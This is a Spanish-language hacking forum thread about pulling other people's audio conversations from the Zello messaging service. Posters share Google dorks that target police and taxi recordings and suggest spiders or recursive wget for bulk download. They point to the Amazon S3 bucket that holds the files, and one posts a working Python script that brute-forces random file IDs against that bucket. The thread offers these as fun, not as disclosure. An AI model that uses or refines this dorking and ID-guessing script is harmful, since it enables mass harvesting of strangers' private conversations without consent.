El caso de la red Zello o como intervenir comunicaciones en red social

  • 6 Respuestas
  • 3846 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Rootkit_Pentester

  • *
  • Underc0der
  • Mensajes: 218
  • Actividad:
    0%
  • Reputación 8
    • Ver Perfil
    • Email
Hola gente hoy les voy a hablar de una red social como whatsapp o telegram, pero es por audio o videoconferencia...

Aqui les mando el link de esta red que presume tener 120 millones de usuarios xD. Link project:

You are not allowed to view links. Register or Login



Lo que mola con esta red es que es totalmente insegura y uno puede encontrarse con video conferencias y audios de todo tipo, sin mas haciendo "hacking con buscadores" con google.

Dork PoC: site:zello.com/shared

68.000 audios y charlas de todo tipo, pero filtremos...

site:zello.com/shared/ policia

78 resultados entre ellos...


You are not allowed to view links. Register or Login

O

You are not allowed to view links. Register or Login

PoC Taxis:

site:zello.com/shared taxy

14000 resultados...

Algunos como:

You are not allowed to view links. Register or Login

Espero que se entretengan y sed buenos!.
Saludos Rootkit_Pentester.

"Dame un buscador y movere el mundo".


Desconectado Tatoluckyfox

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
Parece que se pueden obtener de forma masiva los archivos mp3 de los audios.
Para acceder al archivo en sí, solo hace falta escribir esta dirección:

Citar
You are not allowed to view links. Register or Login<id>.mp3

Con un regex y un spider se podrían descargar conversaciones de forma masiva.

Desconectado Rootkit_Pentester

  • *
  • Underc0der
  • Mensajes: 218
  • Actividad:
    0%
  • Reputación 8
    • Ver Perfil
    • Email
You are not allowed to view links. Register or Login
Parece que se pueden obtener de forma masiva los archivos mp3 de los audios.
Para acceder al archivo en sí, solo hace falta escribir esta dirección:

Citar
You are not allowed to view links. Register or Login<id>.mp3

Con un regex y un spider se podrían descargar conversaciones de forma masiva.

Genial esa critica @You are not allowed to view links. Register or Login, espero otras xD. Mientras tanto cazo mi burpsuite jeje. Saludos }:)

Conectado DtxdF

  • *
  • Moderador Global
  • Mensajes: 721
  • Actividad:
    100%
  • Reputación 16
  • Eres un auto y tienes dos opciones: Parar o Seguir
    • Ver Perfil
    • Mi repositorio de Github donde encontraras herramientas para tu trabajo.
    • Email
@You are not allowed to view links. Register or Login

You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
Parece que se pueden obtener de forma masiva los archivos mp3 de los audios.
Para acceder al archivo en sí, solo hace falta escribir esta dirección:

Citar
You are not allowed to view links. Register or Login<id>.mp3

Con un regex y un spider se podrían descargar conversaciones de forma masiva.

Genial esa critica @You are not allowed to view links. Register or Login, espero otras xD. Mientras tanto cazo mi burpsuite jeje. Saludos }:)

se puede usar wget de forma recursiva
Los seres humanos son robots, cuyo combustible es el afanado dinero.

Desconectado Rootkit_Pentester

  • *
  • Underc0der
  • Mensajes: 218
  • Actividad:
    0%
  • Reputación 8
    • Ver Perfil
    • Email
Tambien se puede usar wget de forma recursiva, pero...
Tengo una novedad @You are not allowed to view links. Register or Login @You are not allowed to view links. Register or Login

Los mp3 no vienen de: zello.me sino de un bucket de Amazon   ;D

Este es el Bucket xD: You are not allowed to view links. Register or Login
 Pueden explotarlo haciendo los 2  tipos de tecnicas que dicen uds o usar bing o archive.org
tendran 14 audios.

Saludos colegas :D
« Última modificación: Julio 11, 2018, 10:47:29 am por Rootkit_Pentester »

Desconectado Tatoluckyfox

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
You are not allowed to view links. Register or Login
Tambien se puede usar wget de forma recursiva, pero...
Tengo una novedad @You are not allowed to view links. Register or Login @You are not allowed to view links. Register or Login

Los mp3 no vienen de: zello.me sino de un bucket de Amazon   ;D

Este es el Bucket xD: You are not allowed to view links. Register or Login
 Pueden explotarlo haciendo los 2  tipos de tecnicas que dicen uds o usar bing o archive.org
tendran 14 audios.

Saludos colegas :D

Exacto.
Funciona de una manera muy simple:

           https://s3.amazonaws.com/zello.sharedmessages/<id>

Devuelve un 200 OK si hay archivo de audio, y un 403 Forbidden si no hay archivo.


Los IDs, aparentemente, tienen una longitud de entre 5 y 13 caracteres alfanuméricos en mayúsculas y minúsculas.
Este es un pequeño PoC para encontrar archivos de forma aleatoria con solo 5 caracteres de longitud.
Código: Python
  1. import requests
  2. import random
  3.  
  4. def random_string():
  5.  
  6.    return "".join([random.choice("qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM") for _ in range(5)])
  7.  
  8. for x in range(500):
  9.  
  10.    a = random_string()
  11.    req = requests.get("https://s3.amazonaws.com/zello.sharedmessages/" + a, headers={'User-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0'})
  12.    if req.status_code == 200:
  13.  
  14.       print a + " existe.           - - - - - - - - - - - - -"
  15.  
  16.    else:
  17.  
  18.       print a + " no existe. -> " + str(req.status_code)

Y funciona tal que así.

Desconectado Rootkit_Pentester

  • *
  • Underc0der
  • Mensajes: 218
  • Actividad:
    0%
  • Reputación 8
    • Ver Perfil
    • Email
Grande capo @You are not allowed to view links. Register or Login te felicito por el script, creo que te lo voy a robar para usarlo como fuzzer!.
Saludos! ;).

 

Como usar Google DoSear contra sitios web alojados en grandes dominios

Iniciado por Pr0ph3t

Respuestas: 1
Vistas: 4002
Último mensaje Mayo 04, 2012, 12:12:50 am
por Cronos
[GUIA]Como protegerse del doxing y proteger tu informacion personal en telegram

Iniciado por Psico

Respuestas: 5
Vistas: 3024
Último mensaje Julio 07, 2019, 07:05:50 am
por hielasangre
¿Como eche a la gente de mi red WiFi para aumentar mi velocidad de internet?

Iniciado por puntoCL

Respuestas: 12
Vistas: 4820
Último mensaje Mayo 14, 2020, 02:22:43 pm
por MSTR-KR
Curso Metasploit - Part. 3 - Como obteber un meterpreter con EternalBlue

Iniciado por puntoCL

Respuestas: 3
Vistas: 6658
Último mensaje Octubre 01, 2018, 03:05:53 pm
por Kyxda
Como controlar el trafico aereo gracias al hacking de buscadores

Iniciado por Rootkit_Pentester

Respuestas: 7
Vistas: 5786
Último mensaje Abril 22, 2017, 04:38:16 pm
por GotKiller_22